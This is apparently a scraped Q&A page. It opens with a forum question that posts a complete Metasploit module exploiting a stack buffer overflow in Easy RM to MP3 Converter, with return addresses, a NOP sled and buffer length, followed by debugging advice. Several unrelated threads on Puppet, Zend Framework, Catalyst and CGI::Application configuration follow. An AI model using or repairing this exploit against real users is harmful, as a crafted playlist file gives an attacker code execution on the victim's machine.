Problems with metasploit's "Easyrmtomp3" exploit module - exploit

I started learning exploit writing some time back and created a few exploits. One of them being an easy rm to mp3 converter, and it worked pretty well.
However, now I thought about converting my exploits to metasploit modules, and followed the steps given in a number of articles. However, the only error that I am facing is that the payload is not working. Ultimately, I resorted to looking online for a similar module, and found one which is definitely supposed to work. However, I do not get back a meterpreter session or a shell, when using meterpreter payload. After making some changes, here is what I used:
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'Easy RM to MP3 Converter (2.7.3.700) Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in versions 2.7.3.700
creating a specially crafted .m3u8 file, an attacker may be able
to execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Crazy_Hacker', # Original
'buzz',
],
'Version' => 'Version 1',
'References' =>
[
[ 'URL', 'http://packetstormsecurity.org/files/view/79307/easyrmmp3-overflow.txt' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00\x0a",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP2 (En)', { 'Ret' => 0x01A13F01} ], # Universal Address (MSRMCcodec02.dll)
[ 'Windows XP SP3 (Fr)', { 'Ret' => 0x01AAF23A} ], # FFE4 ,JMP, ESP from (MSRMCcodec02.dll)
[ 'Windows XP (Universal)', { 'Ret' => 0x773D4540} ], # JMP ESP in (SHELL32.DLL)
],
'Privileged' => false,
'DefaultTarget' => 1))
register_options(
[
OptString.new('FILENAME', [ false, 'The file name.', 'buzz.m3u']),
], self.class)
end
def exploit
sploit ="A"*26068 # rand_text_alphanumeric(26068) # Buffer Overflow
sploit << [target.ret].pack('V')
sploit << "\x90" * 30 # nopsled
sploit << payload.encoded
sploit << "B"*1000
buzz= sploit
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(buzz)
end
end
I tried out a number of payloads: meterpreter/reverse_tcp, shell/reverse_tcp, e.t.c., but none seem to work. Any solutions?

You should also provide more details about the OS you are using and the params you have provided to run the module.
As you can see the pointer to Ret differs depending on the OS.
Have you attached a debugger yet to see what happens within the application? From what I can see and know about the exploit is that your fuzzing string doesn't seem to be appropriate for the buffer
sploit ="A"*26068
It should be more than that. Attach a debugger and look if EIP has been overwritten.
Regards,
T0X1C

Related

PE Puppet Console and manage multiple node user accounts

I'm new to puppet and using Puppet Enterprise with the module from puppet for accounts. https://forge.puppet.com/puppetlabs/accounts
I'd like to be able to manage the user account details from the PE console for multiple users.
The best I can seem to get to is managing them within
/etc/puppetlabs/code/environments/production/manifests/site.pp
Which contains:
node default {
accounts::user { 'jeff':
comment => 'Jeff McCune',
groups => [
'wheel',
],
locked => true,
sshkeys => [
'ssh-rsa AAAA...',
'ssh-dss AAAA...',
],
password => '!!',
ensure => 'present',
}
accounts::user { 'dave':
comment => 'Dave Smith',
groups => [
'wheel',
],
locked => true,
sshkeys => [
'ssh-rsa AAAA...',
'ssh-dss AAAA...',
],
password => '!!',
ensure => 'present',
}
}
I'd ideally I'd like to be able to manage them per PE classification within the console. So each users details can be parameters I enter in the PE console - the number of users would vary, but just need the principle to able to add more than one.
I've tried adding into a manifest but struggled with declaring more than one account. I did that by:
/etc/puppetlabs/code/environments/production/modules/my_app/manifests/init.pp
which contained:
class my_app (
$username => '',
$usercomment => '',
$sshkey ='',
){
accounts::user { $username:
comment => $usercomment,
groups => [
'sudonopw',
],
locked => false,
sshkeys => [
$sshkey,
],
password => '!!',
ensure => present,
}
}
This allowed me to apply this class to any variation of my node classification and allow me to manage those parameters in the PE console. However I couldn't add more than one account to each node, as the class had been declared.
Can anyone give me some pointers.
Thanks

For Nukeface: Zend Framework 2 + Doctrine2 - Blog tutorialZend\Mvc\Controller\ControllerManager::createFromInvokable: failed retrieving

Following your blog project. Copy/paste code but ran into the problem described below. I would appreciate your assistance with the code that I have pushed to the Git repository Farsideman/Zend-Framework-2-Doctrine2---Blog-tutorial. I can't fathom it even with reading the posted answers to similar questions.
Zend\Mvc\Controller\ControllerManager::createFromInvokable: failed retrieving "blogcontrollerpost(alias: Blog\Controller\Post)" via invokable class "Blog\Controller\PostController"; class does not exist
Thanks
Farsideman
Wow, almost a year, did not realize a question had been posted. Sorry about that.
Hope you figured it out by now, just in case: the problem means that it cannot find the indicated Controller.
This most likely (and most of the times) occurs when an error is made in the configuration of a module or if the files are not in the exact right folders with exactly right capital letters.
So, make sure the structure to the Controller is as follows, starting from the root of the project:
/module/Blog/src/Controller/PostController.php
Next up, check the module.config.php file and make sure you have this, exactly as below:
'controllers' => [
'invokables' => [
'Blog\\Controller\\Post' => 'Blog\\Controller\\PostController',
],
],
Here the Blog\\Controller\\Post is an alias (alternate name) for Blog\\Controller\\PostController.
That it tries to use the alias (without Controller) is setup in the routes.config.php where it is configured that it should use a class with that aliased name and a certain function, e.g.:
//routeName: blog
//route: /blog
'blog' => [
'type' => 'Literal',
'may_terminate' => true,
'options' => [
'route' => '/blog',
'defaults' => [
'module' => 'Blog',
'controller' => 'Blog\\Controller\\Post',
'action' => 'index',
],
],
],
All of the above is present in the "Configure module" chapter of that tutorial.
Note though: the tutorial was posted about halfway 2016, here 'n' there it's a bit outdated by now.
Also, as a side, in the AbstractActionController.php class, add the following:
/**
* {#inheritdoc}
*/
public function getServiceLocator()
{
return $this->getServiceLocator();
}
This will overwrite it's parent function which includes the giant warning that this function is deprecated and its functionality removed in Zend Framework 3.

How to properly use UTF-8-encoded data from Schema inside Catalyst app?

Data defined inside Catalyst app or in templates has correct encoding and is diplayed well, but from database everything non-Latin1 is converted to ?. I suppose problem should be in model class, which is such:
use strict;
use base 'Catalyst::Model::DBIC::Schema';
__PACKAGE__->config(
schema_class => 'vhinnad::Schema::DB',
connect_info => {
dsn => 'dbi:mysql:test',
user => 'user',
password => 'password',
{
AutoCommit => 1,
RaiseError => 1,
mysql_enable_utf8 => 1,
},
'on_connect_do' => [
'SET NAMES utf8',
],
}
);
1;
I see no flaws here, but something must be wrong. I used my schema also with test scripts and data was well encoded and output was correct, but inside Catalyst app i did not get encoding right. Where may be the problem?
EDIT
For future reference i put solution here: i mixed in connect info old and new style.
Old style is like (dsn, username, passw, hashref_options, hashref_other options)
New style is (dsn => dsn, username => username, etc), so right is to use:
connect_info => {
dsn => 'dbi:mysql:test',
user => 'user',
password => 'password',
AutoCommit => 1,
RaiseError => 1,
mysql_enable_utf8 => 1,
on_connect_do => [
'SET NAMES utf8',
],
}
In a typical Catalyst setup with Catalyst::View::TT and Catalyst::Model::DBIC::Schema you'll need several things for UTF-8 to work:
add Catalyst::Plugin::Unicode::Encoding to your Catalyst app
add encoding => 'UTF-8' to your app config
add ENCODING => 'utf-8' to your TT view config
add <meta http-equiv="Content-type" content="text/html; charset=UTF-8"/> to the <head> section of your html to satisfy old IEs which don't care about the Content-Type:text/html; charset=utf-8 http header set by Catalyst::Plugin::Unicode::Encoding
make sure your text editor saves your templates in UTF-8 if they include non ASCII characters
configure your DBIC model according to DBIx::Class::Manual::Cookbook#Using Unicode
if you use Catalyst::Authentication::Store::LDAP configure your LDAP stores to return UTF-8 by adding ldap_server_options => { raw => 'dn' }
According to Catalyst::Model::DBIC::Schema#connect_info:
The old arrayref style with hashrefs for DBI then DBIx::Class options is also supported.
But you are already using the 'new' style so you shouldn't nest the dbi attributes:
connect_info => {
dsn => 'dbi:mysql:test',
user => 'user',
password => 'password',
AutoCommit => 1,
RaiseError => 1,
mysql_enable_utf8 => 1,
on_connect_do => [
'SET NAMES utf8',
],
}
This advice assumes you have fairly up to date versions of DBIC and Catalyst.
This is not necessary: on_connect_do => [ 'SET NAMES utf8' ]
Ensure the table|column charsets are UTF-8 in your DB. You can achieve things that sometimes look right even when parts are broken. The DB must be saving the character data as UTF-8 if you expect the entire chain to work.
Ensure you're using and configuring Catalyst::Plugin::Unicode::Encoding in your Catalyst app. It did have serious-ish bugs in the not too distant past so get the newest.

CGI Application Authentication using multiple drivers

I have been trying to authenticate my CGI application through 2 drivers, one that uses username/password stored in the database and other using ldap active directory.
following is the code
$self->authen->config(
DRIVER => [ 'DBI',
DBH => $self->dbh,
TABLE => 'user',
CONSTRAINTS => {
'user.username' => '__CREDENTIAL_1__',
'MD5:user.password' => '__CREDENTIAL_2__'
},
],
DRIVER => [ 'Authen::Simple::LDAP',
host => 'ldapad.company.com',
basedn => 'OU=XXX,OU=XX,DC=XXX,DC=XXX',
binddn => 'CN=usename,OU=Users,OU=XXX,OU=AD,DC=XXX,DC=xxx',
bindpw => 'secret',
filter => '(cn=%s)',
],
CREDENTIALS => [ 'authen_username', 'authen_password' ],
STORE => 'Session',
LOGOUT_RUNMODE => 'logout',
LOGIN_RUNMODE => 'login',
POST_LOGIN_RUNMODE => 'okay',
RENDER_LOGIN => \&my_login_form,
);
How do I make the application check the other driver is not authenticated with one.
Right now, as expected, its the driver listed at the bottom that works and they both do, depending on which was assigned last.
I'm assuming you're using CGI::Application::Plugin::Authentication.
I think there's a small problem in your code, that justifies the fact that only the last of the two works.
Your code is like:
$self->authen->config(
DRIVER => [ 'DBI', ... ],
DRIVER => [ 'Authen::Simple::LDAP', ... ],
CREDENTIALS => [ 'authen_username', 'authen_password' ],
STORE => 'Session',
# ...
);
but $self->authen->config() takes a hash. For example, take a look at this example from the C::A::P::Authentication distribution.
Being a hash, that means that the last DRIVER entry will overwrite the previous ones.
I believe the fix is very simple:
$self->authen->config(
DRIVER => [
[ 'DBI', ... ],
[ 'Authen::Simple::LDAP', ... ],
],
CREDENTIALS => [ 'authen_username', 'authen_password' ],
STORE => 'Session',
# ...
);
You can find an example of this in the module documentation:
http://search.cpan.org/~silasmonk/CGI-Application-Plugin-Authentication/lib/CGI/Application/Plugin/Authentication.pm#config
How do I make the application check the other driver is not authenticated with one.
It sounds to me like you want to check if more than one authentication method works, rather than the last one that works. Could you set up 3 different $self->authen->config() and try to login 3 different times? You use a hash to track the methods that work.

Using Apache::Session::Memcached with MasonX::Request::WithApacheSession

I'm trying to use Apache::Session::Memcached in an HTML::Mason project where I'm using MasonX::Request::WithApacheSession to handle my sessions. Unfortunately Apache will not launch when I plug in the Memcached module instead of the MySQL one. My custom handler looks something like this (a few snips here and there):
my $ah = HTML::Mason::ApacheHandler->new (
comp_root => $ENV{HTDOCS},
data_dir => $data_dir,
request_class => 'MasonX::Request::WithApacheSession',
session_use_cookie => 0,
args_method => "mod_perl",
session_args_param => 'session_id',
session_class => 'Apache::Session::Memcached',
session_Servers => '127.0.0.1:20000',
session_Readonly => 0,
session_Debug => 1,
session_cookie_domain => $CONF->{global}->{site_name},
session_cookie_expires => "session",
session_allow_invalid_id => 0,
);
The problem I'm running into is that the session_* paramaters specific to Memcached are not being passed through to Apache::Session::Memcached like the docs say it should. This results in this error:
The following parameter was passed in the call to HTML::Mason::ApacheHandler->new()
but was not listed in the validation options: session_Servers
Now, I have gone through and swapped all of the 3 upper case arguments to lower case, to no avail. And the docs for Apache::Session::Memcached list them as upper case.
Thanks a ton for any help.
It looks like you need to register Apache::Session::Memcached with Apache::Session::Wrapper, following the instructions at http://search.cpan.org/perldoc/Apache::Session::Wrapper#REGISTERING_CLASSES like so (code courtesy Jack M.):
Apache::Session::Wrapper::->RegisterClass(
'name' => 'Apache::Session::Memcached',
'required' => [ [ 'Servers' ], ],
'optional' => [ 'NoRehash', 'Readonly', 'Debug', 'CompressThreshold', ],
);